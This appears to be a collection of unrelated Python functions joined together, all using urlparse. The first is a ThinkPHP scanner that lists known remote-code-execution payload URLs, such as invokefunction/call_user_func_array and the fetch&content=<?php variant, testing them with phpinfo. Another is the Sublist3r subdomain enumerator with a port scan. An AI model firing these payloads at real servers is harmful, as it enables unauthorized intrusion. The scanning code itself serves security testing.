def run_detect(self, url): if not urlparse(url).scheme: url = 'https://' + url else: url = url try: #thinkphp3.0 ThinkPHP 2.1 { Fast & Simple OOP PHP Framework } rce 暂时还没找到能确定tp5.1的指纹,这里先用报错的 rep = requests.get(url + "/index.php/herxdjhrelzfndk.html", timeout=10, verify=False) if "ThinkPHP" in rep.text and "2.1" in rep.text and "{ Fast & Simple OOP PHP Framework }" in rep.text: #if "phpinfo()" in requests.get(url + "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D").text: cprint( '[thinkphp 3.0 rce ] {}'.format( url + "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D"), 'red') self.vul_list.append([ 'thinkphp 3.0', url + "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D" ]) # else: # cprint('[thinkphp 3.0] {}'.format(url), 'red') # self.vul_list.append(['thinkphp 3.0', url]) if "ThinkPHP" in rep.text and "5.1" in rep.text and "www.thinkphp.cn" in rep.text: #if "phpinfo()" in requests.get(url + "/index.php?s=index/\\think\Request/input&filter=phpinfo&data=1").text: cprint( '[thinkphp 5.1 rce ] {}'.format( url + "/index.php?s=index/\\think\Request/input&filter=phpinfo&data=1" ), 'red') self.vul_list.append([ 'thinkphp 5.1', url + "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D" ]) # else: # cprint('[thinkphp 5.1] {}'.format(url), 'red') # self.vul_list.append(['thinkphp 5.1', url]) # thinkphp3.2 使用4e5e5d7364f443e28fbf0d3ae744a59a检测 rce rep = requests.get(url + "/index.php?c=4e5e5d7364f443e28fbf0d3ae744a59a", timeout=10, verify=False) if rep.status_code == 200 and "PNG" in rep.text: #if "phpinfo()" in requests.get(url + "/?a=fetch&content=<?php%20phpinfo();die();").text: cprint( '[thinkcmf 3.2 rce ] {}'.format( url + "/?a=fetch&content=<?php%20phpinfo();die();"), 'red') self.vul_list.append([ 'thinkcmf 3.2', url + "/?a=fetch&content=<?php%20phpinfo();die();" ]) # else: # cprint('[thinkphp 3.2] {}'.format(url), 'red') # self.vul_list.append(['thinkphp 3.2', url]) # thinkphp5.0 使用index.php?s=captcha检测 rep = requests.get(url + "/index.php?s=captcha", timeout=10, verify=False) if rep.status_code == 200 and "PNG" in rep.text: #if "phpinfo()" in requests.get(url + "/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1").text: cprint( '[thinkphp 5.0 rce ] {}'.format( url + "/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" ), 'red') self.vul_list.append([ 'thinkphp 5.0', url + "/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" ]) # else: # cprint('[thinkphp 5.0] {}'.format(url), 'red') # self.vul_list.append(['thinkphp 5.0', url]) except Exception as e: pass
def __init__(self, url, dist=None, comp=None, arch='iphoneos-arm'): self.url = url if dist is None: release_path = 'Release' else: release_path = '/'.join(('dists', dist, 'Release')) release = self._fetch_relative(release_path, verify=False) if release.ok: self._release = Utils.asstring_to_dict(release.text) self.name = self._release['Origin'] self.label = self._release.get('Label', self.name) else: self._release = dict() urlparsed = urlparse(self.url) self.name = urlparsed.netloc + urlparsed.path self.label = self.name self._integrity_by_file = dict() if 'MD5Sum' in self._release: for l in self._release['MD5Sum'].split('\n'): l = l.strip() if not l: continue md5sum, size, name = map(str.strip, l.split()) self._integrity_by_file[name] = { 'size': int(size), 'md5': md5sum } self.packages = list() self.packages_by_name = dict() if dist is None or comp is None: packages_path = 'Packages' else: packages_path = '/'.join(('dists', dist, comp, 'binary-' + arch, 'Packages')) for pkgstr in self._fetch_bz2(packages_path).split('\n\n'): if not pkgstr: continue pkg = Package(pkgstr, self) self.packages.append(pkg) if pkg.name in self.packages_by_name: # print('warning: duplicate package %s' % pkg, end=' -- ') prevpkg = self.packages_by_name[pkg.name] if pkg.version > prevpkg.version: # print('overriding prev (%s) since prev is older' % prevpkg) self.packages_by_name[pkg.name] = pkg else: pass # print('not overriding prev (%s) since prev is newer' % prevpkg) else: self.packages_by_name[pkg.name] = pkg
def _get_unauthenticated_response(self, url, method='post'): """Get auth type by tasting headers from the server. Do POST requests be default. HEAD is too error prone, and some servers are set up to redirect to OWA on all requests except POST to the autodiscover endpoint. """ # We are connecting to untrusted servers here, so take necessary precautions. hostname = urlparse(url).netloc if not is_valid_hostname(hostname, timeout=AutodiscoverProtocol.TIMEOUT): # 'requests' is really bad at reporting that a hostname cannot be resolved. Let's check this separately. # Don't retry on DNS errors. They will most likely be persistent. raise TransportError('%r has no DNS entry' % hostname) kwargs = dict(url=url, headers=DEFAULT_HEADERS.copy(), allow_redirects=False, timeout=AutodiscoverProtocol.TIMEOUT) if method == 'post': kwargs['data'] = Autodiscover.payload(email=self.email) retry = 0 t_start = time.monotonic() while True: _back_off_if_needed(self.INITIAL_RETRY_POLICY.back_off_until) log.debug('Trying to get response from %s', url) with AutodiscoverProtocol.raw_session() as s: try: r = getattr(s, method)(**kwargs) r.close() # Release memory break except TLS_ERRORS as e: # Don't retry on TLS errors. They will most likely be persistent. raise TransportError(str(e)) except CONNECTION_ERRORS as e: r = DummyResponse(url=url, headers={}, request_headers=kwargs['headers']) total_wait = time.monotonic() - t_start if _may_retry_on_error( response=r, retry_policy=self.INITIAL_RETRY_POLICY, wait=total_wait): log.debug( "Connection error on URL %s (retry %s, error: %s). Cool down", url, retry, e) self.INITIAL_RETRY_POLICY.back_off(self.RETRY_WAIT) retry += 1 continue else: log.debug("Connection error on URL %s: %s", url, e) raise TransportError(str(e)) try: auth_type = get_auth_method_from_response(response=r) except UnauthorizedError: # Failed to guess the auth type auth_type = NOAUTH if r.status_code in (301, 302): if 'location' in r.headers: # Make the redirect URL absolute try: r.headers['location'] = get_redirect_url(r) except TransportError: del r.headers['location'] return auth_type, r
def _is_youtube_url(url): """Returns true if the URL is to youtube.""" parsed_url = urlparse(url) netloc = parsed_url.netloc return netloc in ["youtu.be", "youtube.com", "www.youtube.com"]
log.setLevel(level) ch = logging.StreamHandler() ch.setLevel(level) format = '%(asctime)s %(levelname)s: %(message)s' formatter = logging.Formatter(format) ch.setFormatter(formatter) log.addHandler(ch) #-------------------------------------------------------------------- # Pick apart the URL parts = urlparse(args.pr) path = parts.path vals = path.split('/') org = vals[1] repo = vals[2] pull = vals[3] num = vals[4] full_name = os.path.join(org, repo) log.debug("Getting repo {r}...".format(r=full_name)) repo = g.get_repo(full_name) log.debug("Getting PR {pr}...".format(pr=num)) pr = repo.get_pull(int(num)) log.info("PR {num}: {title}".format(num=num, title=pr.title))
def main(domain, threads, savefile, ports, silent, verbose, enable_bruteforce, engines): bruteforce_list = set() search_list = set() if is_windows: subdomains_queue = list() else: subdomains_queue = multiprocessing.Manager().list() # Check Bruteforce Status if enable_bruteforce or enable_bruteforce is None: enable_bruteforce = True # Validate domain domain_check = re.compile("^(http|https)?[a-zA-Z0-9]+([\-\.]{1}[a-zA-Z0-9]+)*\.[a-zA-Z]{2,}$") if not domain_check.match(domain): if not silent: print(R + "Error: Please enter a valid domain" + W) return [] if not domain.startswith('http://') or not domain.startswith('https://'): domain = 'http://' + domain parsed_domain = urlparse.urlparse(domain) if not silent: print(B + "[-] Enumerating subdomains now for %s" % parsed_domain.netloc + W) if verbose and not silent: print(Y + "[-] verbosity is enabled, will show the subdomains results in realtime" + W) supported_engines = {'baidu': BaiduEnum, 'yahoo': YahooEnum, 'google': GoogleEnum, 'bing': BingEnum, 'ask': AskEnum, 'netcraft': NetcraftEnum, 'dnsdumpster': DNSdumpster, 'virustotal': Virustotal, 'threatcrowd': ThreatCrowd, 'ssl': CrtSearch, 'passivedns': PassiveDNS } chosenEnums = [] if engines is None: chosenEnums = [ BaiduEnum, YahooEnum, GoogleEnum, BingEnum, AskEnum, NetcraftEnum, DNSdumpster, Virustotal, ThreatCrowd, CrtSearch, PassiveDNS ] else: engines = engines.split(',') for engine in engines: if engine.lower() in supported_engines: chosenEnums.append(supported_engines[engine.lower()]) # Start the engines enumeration enums = [enum(domain, [], q=subdomains_queue, silent=silent, verbose=verbose) for enum in chosenEnums] for enum in enums: enum.start() for enum in enums: enum.join() subdomains = set(subdomains_queue) for subdomain in subdomains: search_list.add(subdomain) if enable_bruteforce: if not silent: print(G + "[-] Starting bruteforce module now using subbrute.." + W) record_type = False path_to_file = os.path.dirname(os.path.realpath(__file__)) subs = os.path.join(path_to_file, 'subbrute', 'names.txt') resolvers = os.path.join(path_to_file, 'subbrute', 'resolvers.txt') process_count = threads output = False json_output = False bruteforce_list = subbrute.print_target(parsed_domain.netloc, record_type, subs, resolvers, process_count, output, json_output, search_list, verbose) subdomains = search_list.union(bruteforce_list) if subdomains: subdomains = sorted(subdomains, key=subdomain_sorting_key) if savefile: write_file(savefile, subdomains) if not silent: print(Y + "[-] Total Unique Subdomains Found: %s" % len(subdomains) + W) if ports: if not silent: print(G + "[-] Start port scan now for the following ports: %s%s" % (Y, ports) + W) ports = ports.split(',') pscan = portscan(subdomains, ports) pscan.run() elif not silent: for subdomain in subdomains: print(G + subdomain + W) return subdomains
def handle_sso_command(cmd): if cmd['prefix'] not in ['dashboard sso enable saml2', 'dashboard sso disable', 'dashboard sso status', 'dashboard sso show saml2', 'dashboard sso setup saml2']: return -errno.ENOSYS, '', '' if not python_saml_imported: return -errno.EPERM, '', 'Required library not found: `python3-saml`' if cmd['prefix'] == 'dashboard sso enable saml2': try: Saml2Settings(mgr.SSO_DB.saml2.onelogin_settings) except Saml2Error: return -errno.EPERM, '', 'Single Sign-On is not configured: ' \ 'use `ceph dashboard sso setup saml2`' mgr.SSO_DB.protocol = 'saml2' mgr.SSO_DB.save() return 0, 'SSO is "enabled" with "SAML2" protocol.', '' if cmd['prefix'] == 'dashboard sso disable': mgr.SSO_DB.protocol = '' mgr.SSO_DB.save() return 0, 'SSO is "disabled".', '' if cmd['prefix'] == 'dashboard sso status': if mgr.SSO_DB.protocol == 'saml2': return 0, 'SSO is "enabled" with "SAML2" protocol.', '' return 0, 'SSO is "disabled".', '' if cmd['prefix'] == 'dashboard sso show saml2': return 0, json.dumps(mgr.SSO_DB.saml2.to_dict()), '' if cmd['prefix'] == 'dashboard sso setup saml2': ceph_dashboard_base_url = cmd['ceph_dashboard_base_url'] idp_metadata = cmd['idp_metadata'] idp_username_attribute = _get_optional_attr(cmd, 'idp_username_attribute', 'uid') idp_entity_id = _get_optional_attr(cmd, 'idp_entity_id', None) sp_x_509_cert_path = _get_optional_attr(cmd, 'sp_x_509_cert', '') sp_private_key_path = _get_optional_attr(cmd, 'sp_private_key', '') if sp_x_509_cert_path and not sp_private_key_path: return -errno.EINVAL, '', 'Missing parameter `sp_private_key`.' if not sp_x_509_cert_path and sp_private_key_path: return -errno.EINVAL, '', 'Missing parameter `sp_x_509_cert`.' has_sp_cert = sp_x_509_cert_path != "" and sp_private_key_path != "" if has_sp_cert: try: with open(sp_x_509_cert_path, 'r', encoding='utf-8') as f: sp_x_509_cert = f.read() except FileNotFoundError: return -errno.EINVAL, '', '`{}` not found.'.format(sp_x_509_cert_path) try: with open(sp_private_key_path, 'r', encoding='utf-8') as f: sp_private_key = f.read() except FileNotFoundError: return -errno.EINVAL, '', '`{}` not found.'.format(sp_private_key_path) else: sp_x_509_cert = '' sp_private_key = '' if os.path.isfile(idp_metadata): warnings.warn( "Please prepend 'file://' to indicate a local SAML2 IdP file", DeprecationWarning) with open(idp_metadata, 'r', encoding='utf-8') as f: idp_settings = Saml2Parser.parse(f.read(), entity_id=idp_entity_id) elif parse.urlparse(idp_metadata)[0] in ('http', 'https', 'file'): idp_settings = Saml2Parser.parse_remote( url=idp_metadata, validate_cert=False, entity_id=idp_entity_id) else: idp_settings = Saml2Parser.parse(idp_metadata, entity_id=idp_entity_id) url_prefix = prepare_url_prefix(mgr.get_module_option('url_prefix', default='')) settings = { 'sp': { 'entityId': '{}{}/auth/saml2/metadata'.format(ceph_dashboard_base_url, url_prefix), 'assertionConsumerService': { 'url': '{}{}/auth/saml2'.format(ceph_dashboard_base_url, url_prefix), 'binding': "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" }, 'attributeConsumingService': { 'serviceName': "Ceph Dashboard", "serviceDescription": "Ceph Dashboard Service", "requestedAttributes": [ { "name": idp_username_attribute, "isRequired": True } ] }, 'singleLogoutService': { 'url': '{}{}/auth/saml2/logout'.format(ceph_dashboard_base_url, url_prefix), 'binding': 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect' }, "x509cert": sp_x_509_cert, "privateKey": sp_private_key }, 'security': { "nameIdEncrypted": has_sp_cert, "authnRequestsSigned": has_sp_cert, "logoutRequestSigned": has_sp_cert, "logoutResponseSigned": has_sp_cert, "signMetadata": has_sp_cert, "wantMessagesSigned": has_sp_cert, "wantAssertionsSigned": has_sp_cert, "wantAssertionsEncrypted": has_sp_cert, "wantNameIdEncrypted": False, # Not all Identity Providers support this. "metadataValidUntil": '', "wantAttributeStatement": False } } settings = Saml2Parser.merge_settings(settings, idp_settings) mgr.SSO_DB.saml2.onelogin_settings = settings mgr.SSO_DB.protocol = 'saml2' mgr.SSO_DB.save() return 0, json.dumps(mgr.SSO_DB.saml2.onelogin_settings), '' return -errno.ENOSYS, '', ''
def check_feed(bot, key): feed_url = re.match("^" + feed_hash.format("(.+):subs$"), key).group(1) logger.info(feed_url) data = feedparser.parse(feed_url) if "link" not in data.feed: if "status" in data and data["status"] != 200: logger.warning(_("{0} - Not a valid feed, got HTTP Code {1}").format(feed_url, data["status"])) else: logger.warning(_("{0} - Not a valid feed: {1}").format(feed_url, str(data.bozo_exception))) return None if "title" not in data.feed: feed_title = data.feed["link"] else: feed_title = data.feed["title"] last_entry_hash = feed_hash.format(feed_url + ":last_entry") last_entry = r.get(last_entry_hash) new_entries = utils.get_new_entries(data.entries, last_entry) for entry in reversed(new_entries): if "title" not in entry: post_title = _("No title") else: post_title = utils.remove_html_tags(entry["title"]).strip() post_title = post_title.replace("<", "<").replace(">", ">") if "link" not in entry: post_link = data.link link_name = post_link else: post_link = entry.link feedproxy = re.search("^https?://feedproxy\.google\.com/~r/(.+?)/.*", post_link) # feedproxy.google.com if feedproxy: link_name = feedproxy.group(1) else: link_name = urlparse(post_link).netloc link_name = re.sub("^www\d?\.", "", link_name) # remove www. if "content" in entry: content = utils.get_content(entry.content[0]["value"]) elif "summary" in entry: content = utils.get_content(entry.summary) else: content = "" text = "<b>{post_title}</b>\n<i>{feed_title}</i>\n{content}".format( post_title=post_title, feed_title=feed_title, content=content ) readmore = _("Read more on {0}").format(link_name) text += "\n<a href=\"{post_link}\">{readmore}</a>\n".format( post_link=post_link, readmore=readmore ) for member in r.smembers(key): try: bot.sendMessage( chat_id=member, text=text, parse_mode=telegram.ParseMode.HTML, disable_web_page_preview=True ) except telegram.error.Unauthorized: logger.warning(_("Chat {0} doesn't exist anymore, will be deleted.").format(member)) r.srem(key, member) r.delete(feed_hash.format(member)) except telegram.error.ChatMigrated as new_chat: new_chat_id = new_chat.new_chat_id logger.info(_("Chat migrated: ") + member + " -> " + str(new_chat_id)) r.srem(key, member) r.sadd(key, new_chat_id) r.rename(feed_hash.format(member), feed_hash.format(new_chat_id)) bot.sendMessage( chat_id=member, text=text, parse_mode=telegram.ParseMode.HTML, disable_web_page_preview=True ) except telegram.error.TimedOut: pass except telegram.error.BadRequest as exception: logger.error(exception) if not r.exists(key): r.delete(last_entry_hash) return # Set the new last entry if there are any if new_entries: if "id" not in new_entries[0]: new_last_entry = new_entries[0].link else: new_last_entry = new_entries[0].id r.set(last_entry_hash, new_last_entry)